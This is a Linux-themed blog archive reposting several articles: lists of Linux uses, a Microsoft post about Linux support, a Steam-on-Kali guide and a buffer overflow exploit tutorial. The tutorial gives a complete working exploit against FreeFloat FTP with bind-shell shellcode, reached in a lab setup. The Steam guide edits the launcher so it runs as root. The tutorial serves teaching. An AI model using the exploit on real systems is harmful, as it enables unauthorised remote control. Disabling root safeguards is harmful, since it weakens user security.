Category Archives: Linux

Top 10 Uses for Linux (Even If Your Main PC Runs Windows)

Even if you’re a Windows (or Mac) user, knowing how to use Linux is avaluable skill, and it can run a bunch of awesome things in your home—even if it isn’t your main desktop OS. Here are 10 ways you can use Linux even if you’re not ready to go full Ubuntu.

10. Troubleshoot Other Computers

Top 10 Uses for Linux (Even If Your Main PC Runs Windows)

You don’t even need to install Linux on a box to make it useful—all you need is a solid live CD. Just boot from the CD and you can grab any files from the hard drive, even if the computer won’t boot or you’ve forgotten your password. Linux can even help if you accidentally formatted your entire drive. Of course, not all system rescue discs are Linux—and there are a lot of good ones out there—but a bit of basic Linux knowledge can turn you into a troubleshooting expert.

9. Make a Chromebook More Useful

Top 10 Uses for Linux (Even If Your Main PC Runs Windows)

You’d be surprised how much you can get done in Chrome OS. There are a lot of great Chrome apps out there for editing audio, video, images, coding, and more—but sometimes you just need a more powerful desktop app you’re familiar with. Luckily, you can install Linux alongside Chrome OS really easily, and get access to a traditional desktop with a bunch of apps. It won’t get you Photoshop or something of that caliber, but if all you need is a bit of a safety net, it’s perfect.

8. Host a Web Site or Webapp

Top 10 Uses for Linux (Even If Your Main PC Runs Windows)

You’d be surprised how many web sites you visit every day actually run on Linux—and if you want to build a web site, you probably will too. Possibly more interesting, though, is how you can use a Linux-based web host—likeDreamhost—to host your own personal RSS reader with Tiny Tiny RSS, or your own Dropbox clone with OwnCloud. You could, of course, host these on a Linux box in your home, too. It’s a bit more complicated, but it gives you complete control over everything rather than putting your data in someone else’s hands.

7. Work with Hard Drives and Partitions

Top 10 Uses for Linux (Even If Your Main PC Runs Windows)

If you dual- or triple-boot your system and ever want to move partitions around, you’ll have a much easier time with a Linux live CD and GParted. Heck, even if you don’t dual-boot, you’ll still need a bit of help from Linux if you ever migrate to a solid-state drive, or upgrade to a more spacious drive. And, if you want to securely wipe it so no one can get at your data…well, Ubuntu can do that too.

6. Automate Everything In Your Home

http://lifehacker.com/ajax/inset/iframe?id=youtube-video-PXmCiaRc9XU&start=0

With a little Linux knowledge and a cheap computer—like the Raspberry Pi—you can create all sorts of tiny home automation gadgets. You can control your home with Siri, mount a Google Calendar tablet on your wall, set up a home surveillance system, control your blinds and air conditioner, stream music in your living room, build a digital photo frame, build a sunrise alarm clock, and…pretty much anything else you can think of. With a cheap board like the Raspberry Pi and a free OS like Linux, you’re more limited by your imagination than your wallet.

5. Run a Home Server for Backup, Streaming, Torrenting, and More

Top 10 Uses for Linux (Even If Your Main PC Runs Windows)

If you don’t want to leave your computer on 24/7 just to share files or download torrents, a tiny dedicated Linux box might be a better solution. With an old computer or a cheap new one, you can put together a home server that stores your backups, streams movies and musics, seeds torrents, or performs any number of other tasks quietly in the corner. You can put one together with Nas4Free, FreeNAS, or even Ubuntu—though our favorite solution is the Linux-based Amahi. (Yes, we know FreeNAS and NAS4Free are technically FreeBSD—but we’re going to lump them in with Linux for practical purposes.)

4. Create a Dedicated Media Center or Video Game Machine


If you have a computer that won’t even use the desktop—like a media center or dedicated emulation machine—why not just set it up with a Linux backend? It’s free and easy to do. XBMC works great on Linux, whether you’re running on a Raspberry Pi or just a low-powered PC, and you can turn just about any PC into an all-in-one retro video game console. The Raspberry Pi works well for older games, but you’d want something more powerful to play newer stuff. Heck, you could even use it to create a retro arcade coffee table.

3. Brush Up on Your Hacking and Security

Top 10 Uses for Linux (Even If Your Main PC Runs Windows)

Some Linux distributions, like BackTrack or Kali, are security-focused distros for testing security systems. That means you can use them to learn how to, say, hack WEP or WPA Wi-Fi passwords, which is a great way to learn a bit more about your own network security and how to protect yourself from similar attacks. Of course, we don’t recommend using these powers for evil—but knowing evil’s tricks gives you a good path to preventing them.

2. Revive an Old or Slow PC

Top 10 Uses for Linux (Even If Your Main PC Runs Windows)

And so we come to one of the most obvious and common uses for Linux—and still one of the best. If you have a PC that’s seen better days, Windows is far from the ideal OS. install a lightweight Linux distribution on it (like Lubuntuor, if you’re a bit more savvy, Archbang) and it’ll feel like a new machine again. It may not be able to do everything your powerful Windows machine can do, but it’s better than having a non-functional computer, and works perfectly for basic tasks.

1. Learn More About How Computers Work

Top 10 Uses for Linux (Even If Your Main PC Runs Windows)

If none of the above sound like anything you need, why not just get in the spirit of DIY and learn a little bit more about how computers work? Tons of things run Linux these days, from TVs to the Android phone in your pocket, and learning about Linux is not only a fun hobby in and of itself, but it’ll help you learn a bit more about what makes these machines tick. We recommendgetting started with something like Ubuntu or Mint, then when you get a little more familiar, move onto Arch for some serious learning. There are a ton of great distros out there, and even if you’re just playing around, you may find that those skills come in pretty handy one day.

Source:lifehacker.com

 

Advertisements

Microsoft loves Linux

But you may ask “Why is Microsoft working with Linux and open source?”, or “What’s Microsoft’s plan going forward?”, or “What does ‘Microsoft loves Linux’ mean for me as a customer?”

At the core, “Microsoft ♥ Linux” is driven by what we’ve heard from you as customers.  You run workloads on Windows.  You run workloads on Linux.   You run these workloads in your on-premises datacenters, hosted at service providers, and in public clouds.  You just want it all to work, and to work together regardless of the operating system.  We hear you, and understand that your world is heterogeneous.  Bottom line, this is a business opportunity for Microsoft to offer heterogeneous support — both Windows and Linux workloads – on-premises and in a public cloud.  Microsoft can add real value in a heterogeneous cloud.

It may come as a surprise, but Microsoft has been working with Linux for a number of years.  System Center Operations Manager has offered Linux and UNIX monitoring since 2009.   Drivers for running Linux guests on Hyper-V became widely available for a number of distros in 2010, and we even have drivers for running FreeBSD guests on Hyper-V.  Microsoft Azure offered Linux VMs on “day 1” of the Azure IaaS general availability in 2013.

We’ve built a significant customer base that is using Linux with Microsoft products.  Several hundred thousand Linux and UNIX servers in production usage today are managed by System Center, with the largest customers managing nearly 10,000 Linux servers.  Customers such as Ancestry.com, Equifax, the United Kingdom government FCO Services, and Europcar operate Microsoft clouds on-premises running Hyper-V and System Center with many VMs running Linux.  More than 20% of the VMs in Azure IaaS are running Linux.  Azure is offering the HDInsight (Hadoop) service running on Linux in addition to running on Windows.  And if you look more broadly, Microsoft offers key productivity software such as Office365, Skype, and RDP clients on Linux-based and BSD-based client operating systems such as iOS, Android, and Mac OS X.

What does this all add up to?  Working with Linux isn’t new at Microsoft.  In fact, Linux is already a sizable commitment for Microsoft that is now getting a higher public profile.  We see executing on that commitment as a critical part of what we offer customers.

Linux in your datacenter

Microsoft is making huge investments in the foundational cloud technologies that are described in other entries in this blog series:  Compute, Networking, and Storage.  These investments are informed by our experience with the hyper-scale Azure public cloud.  They are also independent of the guest operating system, so they work for both Windows and Linux.  Great features like storage quality-of-service, network virtualization, and super-fast live migration using RDMA work for Linux just like they work for Windows.  In the product development teams, when we envision and design new capabilities for the cloud foundation, we ask “How does this work for Windows?” and we ask “How does this work for Linux?”   As a result, the Microsoft offering for on-premises datacenters is fundamentally heterogeneous, able to run Windows and Linux guests in a unified fashion.

Of course, some capabilities require the cooperation of the guest OS.  For these capabilities, Microsoft developers write the Linux device driver code for Hyper-V and participate in the Linux community to get the code into the upstream Linux kernel at kernel.org.  Then we engage with distro vendors like Red Hat, Canonical, Oracle, and SUSE to enable full support on Hyper-V for these distros that you are probably running.  As a result, Linux runs great on Hyper-V!

We also invest in the management layer.  We are announcing that the first version of Powershell Desired State Configuration (DSC) for Linux is now available. With DSC for Linux, you can do consistent configuration management across Windows and Linux.  On Linux you can install packages, configure files, create users & groups, and set up services.   DSC for Linux is also an open source project, available on GitHub.

Our enterprise management functionality in System Center Operations Manager, Configuration Manager, Virtual Machine Manager, and Data Protection Manager manages Linux right alongside Windows so that you can have a single systems management infrastructure for your heterogeneous datacenter.   We’ve taken System Center management beyond just the Linux operating system, and into open source middleware such as Tomcat, JBoss, Apache Web Server, and MySQL.  Also, we have extended our hybrid services to include Linux — for example, Azure Site Recovery between on-premises datacenters (or service providers) and Azure.

Linux in Microsoft Azure

As we’re doing for the on-premises datacenter, Microsoft is making huge investments in the Azure public cloud.  Again, our goal is that everything in Azure works for Linux VMs just like it works for Windows VMs.  Capabilities like the huge “G” series VM sizes, Premium Storage, and Azure Backup for VMs are available for both Windows and Linux, as is a range of extensions for custom scripting, regaining access, and OS patching.  Some capabilities, such as integration with Docker, Chef, and other open source projects, are available to you on Linux before they are available on Windows.

Azure offers a range of enterprise-ready Linux distros in Azure:  SUSE Linux Enterprise Server, openSUSE, Ubuntu Linux, Oracle Linux, and Core OS, as well as community distro such as CentOS.  Or you can upload your own custom Linux image.

If you are consuming Azure services, you want flexibility to access those services from a Windows computer, or from a Linux or Mac OS X computer.  For starters, you’ve probably used the Azure portal, which is an HTML5 web application that works in browsers running on Windows as well as browsers on Linux and Mac OS X.  But as your usage progresses, you may want to integrate Azure into your operational processes.  On Windows, Powershell is the primary scripting and automation interface.   For Linux and Mac OS X (and Windows), Azure offers a node.js-based package of commands for scripting and automating the full lifecycle of Azure services.

In Azure datacenters, Microsoft personnel are now operating PaaS services based on Linux as well as services based on Windows.  The HDInsight (Hadoop) service is the first to be available on Linux, and it makes good business sense for other services using “born on Linux” open source projects to just run on Linux rather than being ported to Windows.  Internal tools for monitoring, diagnosing, patching, and meeting compliance requirements have been extended to include these Linux-based services.

Summary

Microsoft is doing a lot of work with Linux – for on-premises datacenters and services providers, as well as in the Azure public cloud.  We know you run workloads on both Windows and Linux.  We’ve made running and managing Linux workloads a fundamental part of our product offering so that the result is well integrated and just works.  Go towww.microsoft.com/open to learn more about the investments we’re making.  Remember, “Microsoft ♥ Linux”!

Source: blogs.technet.com

My First Buffer Overflow Exploit

Saved Return Pointer Overflows

For our first buffer overflow exploit we will be starting with the most straight forward scenario where we have a clean EIP overwrite and one of our CPU registers points directly to a large portion of our buffer. For this part we will be creating an exploit from scratch for ”FreeFloat FTP”. You can find a list of several exploits that were created for ”FreeFloat FTP” here.

 

Normally we would need to do badcharacter analysis but for our first tutorial we will rely on the badcharacters that are listed in the pre-existing metasploit modules on exploit-db. The characters that are listed are ”\x00\x0A\x0D”. We need to keep these characters in mind for later.

 

Exploit Development: Backtrack 5/Kali Linux
Debugging Machine: Windows XP PRO SP3
Vulnerable Software: Download

 

Replicating The Crash

First of all we need to create a POC skeleton exploit to crash the FTP server. Once we have that we can build on it to create our exploit. You can see my POC below, I have based it on the exploits for ”FreeFloat FTP” that I found on exploit-db. We will be using the pre-existing ”anonymous” user account which comes configured with the FTP server (the exploit should work with any valid login credentials).

#!/usr/bin/python
import socket
import sys
evil = "A"*1000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close

 

Ok, so far so good, when we attach the debugger to the FTP server and send our POC buffer the program crashes. In the screenshot below you can see that EIP is overwritten and that two registers (ESP and EDI) contain part of our buffer. After analyzing both register dumps ESP seems more promising since it contains a larger chunk of our buffer (I should mention however that creating an exploit starting in EDI is certainly possible).

 

 

Overwriting EIP

Next we need to analyze our crash, to do that we need to replace our A’s with the metasploit pattern and resend our buffer. Pay attention that you keep the original buffer length since a varying buffer length may change the program crash.

root@bt:~/Desktop# cd /pentest/exploits/framework/tools/
root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A
d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah
0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5
Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0A
o1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar
6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1
Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6A
y7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc
2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7
Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

 

When the program crashes again we see the same thing as in the screenshot above except that EIP (and both registers) is now overwritten by part of the metasploit pattern. Time to let “mona” do some of the heavy lifting. If we issue the following command in Immunity debugger we can have “mona” analyze the program crash. You can see the result of that analysis in the screenshot below.
!mona findmsp

 

From the analysis we can see that EIP is overwritten by the 4-bytes which directly follow after the initial 247-bytes of our buffer. Like I said before we can also see that ESP contains a larger chunk of our buffer so it is a more suitable candidate for our exploit. Using this information we can reorganize the evil buffer in our POC above to look like this:
evil = “A”*247 + “B”*4 + “C”*749
When we resend our modified buffer we can see that it works exactly as we expected, EIP is overwritten by our four B’s.

 

That means that we can replace those B’s with a pointer that redirects execution flow to ESP. The only thing we need to keep in mind is that our pointer can’t contain any badcharacters. To find this pointer we can use “mona” with the following command. You can see the results in the screenshot below.
!mona jmp -r esp

 

 

It seems that any of these pointers will do, they belong to OS dll’s so they will be specific to “WinXP PRO SP3” but that’s not our primary concern. We can just use the first pointer in the list. Keep in mind that we will need to reverse the byte order due to the Little Endian architecture of the CPU. Observe the syntax below.
Pointer: 0x77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v7.0.2600.5701 (C:\WINDOWS\system32\msvcrt.dll)
Buffer: evil = “A”*247 + “\x59\x54\xC3\x77” + “C”*749
I should stress that it is important to document your exploit properly for your own and others edification. Our final stage POC should look like this.

#!/usr/bin/python
import socket
import sys
#------------------------------------------------------------
# Badchars: \x00\x0A\x0D
# 0x77c35459 : push esp #  ret  | msvcrt.dll
#------------------------------------------------------------
evil = "A"*247 + "\x59\x54\xC3\x77" + "C"*749
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close

 

Ok lets restart the program in the debugger and put a breakpoint on our pointer so the debugger pauses if it reaches it. As we can see in the screenshot below EIP is overwritten by our pointer and we hit our breakpoint which should bring us to our buffer located at ESP.

 

 

 

Shellcode + Game Over

We are almost done. We need to (1) modify our POC a bit to add a variable for our shellcode and (2) insert a payload that is to our liking. Lets start with the POC, we will be inserting our payload in the part of the buffer that is now made up of C’s. Ideally we would like to have the buffer length modified dynamically so we don’t need to recalculate if we insert a payload with a different size (our total buffer length should remain 1000-bytes). We should also insert some NOP’s (No Operation Performed = \x90) before our payload as padding. You can see the result below. Any shellcode that we insert in the shellcode variable will get executed by our buffer overflow.

#!/usr/bin/python
import socket
import sys
shellcode = (
)
#------------------------------------------------------------
# Badchars: \x00\x0A\x0D
# 0x77c35459 : push esp #  ret  | msvcrt.dll
#------------------------------------------------------------
buffer = "\x90"*20 + shellcode
evil = "A"*247 + "\x59\x54\xC3\x77" + buffer +"C"*(749-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close

 

All that remains now is to pop in some shellcode. We will be using msfpayload to generate our shellcode and pipe the raw output to msfencode to filter out badcharacters.

 

root@bt:~# msfpayload -l
[...snip...]
windows/shell/reverse_tcp_dns     Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell_bind_tcp            Listen for a connection and spawn a command shell
windows/shell_bind_tcp_xpfw       Disable the Windows ICF, then listen for a connection and spawn a 
                                  command shell
[...snip...]

root@bt:~# msfpayload windows/shell_bind_tcp O

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell
  
root@bt:~# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

unsigned char buf[] = 
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92";

After prettifying the code a bit and adding the relevant notes the final exploit is ready.

#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Exploit: FreeFloat FTP (MKD BOF)                                                 #
# OS: WinXP PRO SP3                                                                #
# Author: b33f (Ruben Boonen)                                                      #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 2 of my Exploit Development tutorial series... #
#----------------------------------------------------------------------------------#
# root@bt:~/Desktop# nc -nv 192.168.111.128 9988                                   #
# (UNKNOWN) [192.168.111.128] 9988 (?) open                                        #
# Microsoft Windows XP [Version 5.1.2600]                                          #
# (C) Copyright 1985-2001 Microsoft Corp.                                          #
#                                                                                  #
# C:\Documents and Settings\Administrator\Desktop>                                 #
#----------------------------------------------------------------------------------#
import socket
import sys
#----------------------------------------------------------------------------------#
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                     #
#----------------------------------------------------------------------------------#
shellcode = (
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92")
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D                                                           #
# 0x77c35459 : push esp #  ret  | msvcrt.dll                                       #
# shellcode at ESP => space 749-bytes                                              #
#----------------------------------------------------------------------------------#
buffer = "\x90"*20 + shellcode
evil = "A"*247 + "\x59\x54\xC3\x77" + buffer + "C"*(749-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close

 

In the screenshot below we can see the before and after output of the “netstat -an” command and below that we have the backtrack terminal output when we connect to our bind shell. Game Over!!

 

root@bt:~/Desktop# nc -nv 192.168.111.128 9988
(UNKNOWN) [192.168.111.128] 9988 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.111.128
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 

C:\Documents and Settings\Administrator\Desktop>

Source:  fuzzysecurity.com

Image Source: img.wonderhowto.com

Install Steam on Kali Sana

Well I had a hell of a time installing Steam on Kali Linux. I got it up and going and figured I would make a guide on getting it up and running fast with a root account none of this was really my work but I had to use a few other people’s are work and I have noted where I have found it at as they deserve the credit. Also note you will have to figure out how to install your own restricted drivers if you want your video card to run optimal but I have faith in you to figure that out.

Step 1:

Install Code-Jokey before you start as it is required and makes it run a little better. Credits are in the Script.

#!/bin/bash
#inspired by kochd’s script
# installs equivs which is used to generate fake packages
sudo apt-get install equivs# creates a file called ‘tmp’
> tmp# appends package info to tmp
echo ”
Package: jockey-common
Priority: optional
Section: admin
Installed-Size: 728
Maintainer: Martin Pitt <martin.pitt@ubuntu.com>
Architecture: all
Source: jockey
Version: 0.9.7-0ubuntu7
Depends: bash,
Description: user interface and desktop integration for driver management
Jockey provides a user interface for configuring third-party drivers,
such as the Nvidia and ATI fglrx X.org and various Wireless LAN
kernel modules.
.
This package contains the common data shared between the frontends.
Python-Version: 2.7” >> tmp

# builds fake package
equivs-build tmp
# installs fake package
sudo dpkg -i jockey-common_0.9.7-0ubuntu7_all.deb

rm tmp jockey-common_0.9.7-0ubuntu7_all.deb

 

Step 2:

Download the edited client:

In Terminal

dpkg –add-architecture i386

apt-get update

wget https://github.com/GhostSquad57/Steam-Installer-for-Wheezy/raw/master/steam-debian_1.0.0.43-2_all.deb
sudo dpkg -i steam-debian_1.0.0.43-2_all.deb

Step 3:

Run it as Root

Browse to /usr/bin/
find steam and edit the file and in the middle area find this

# Don’t allow running as rootif [ “$(id -u)” == “0” ]; then
show_message –error $”Cannot run as root user”
exit 1
fi

and replace the 0 with a 1 like this

# Don’t allow running as root
if [ “$(id -u)” == “1” ]; then
show_message –error $”Cannot run as root user”
exit 1
fi

Well if you liked this please comment …

Source: techienewsnetwork.com

 

80+ Best Free Hacking Tutorials | Resources to Become Pro Hacker

Green-Hacker-Wallpaper-Desktop

Learning to become hacker is not as easy as learning to become a software developer. I realized this when I started looking for learning resources for simple hacking people do. Even to start doing the simplest hack on own, a hacker requires to have in depth knowledge of multiple topics. Some people recommend minimum knowledge of few programming languages like C, Python, HTML with Unix operating system concepts and networking knowledge is required to start learning hacking techniques.

Though knowing a lot of things is required, it is not really enough for you to be a competent and successful hacker. You must have a passion and positive attitude towards problem solving. The security softwares are constantly evolving and therefore you must keep learning new things with a really fast pace.

If you are thinking about ethical hacking as a career option, you may need to be prepared for a lot of hard/smart work. I hope these free resources will help you speed up on your learning. If you decide you pursue ethical hacking as a career option, you may also want to read some

IN DEPTH ETHICAL HACKING BOOKS

.

A lot of people (including me before doing research for this article) think that they can become a hacker using some free hacking tools available on web. Its true that some common types of hacking can be easily done with help of tools, however doing it does not really make you a hacker. A true hacker is the one who can find a vulnerability and develop a tool to exploit and/or demonstrate it.

Hacking is not only about knowing “how things work”, but its about knowing “why things work that way” and “how can we challenge it”.

Below are some really useful hacking tutorials and resources you may want to explore in your journey of learning to hack

Hacking For Dummies – Beginners Tutorials

These tutorials are not really simple for anyone who is just starting to learn hacking techniques. However, these should be simple starting point for you. I am sure you have different opinion about complexity of each tutorial however advanced hacker are going to be calling this a job of script kiddie (beginner hacker). Even to acquire the skills of a script kiddie you need to have good understanding of computer fundamentals and programming.

  1. CYBRARY – For those looking to learn ethical hacking skills online, Cybrary provides the perfect platform to do so. Cybrary is a free online IT and cyber security training network that provides instruction in the form of self-paced, easy-to-follow videos. Featuring courses on topics such as Penetration Testing and Ethical Hacking, Advanced Penetration Testing, Post Exploitation Hacking and Computer and Hacking Forensics, Cybrary provides instruction from the beginner to the highly-advanced level of hacking. Additionally, Cybrary offers supplemental study material along with their courses free of charge. With their in-depth training videos and study guides, Cybrary ensures that users develop the best hacking skills.
  2. HACKING TUTORIALS FOR BEGINNERS – By BreakTheSecurity.com
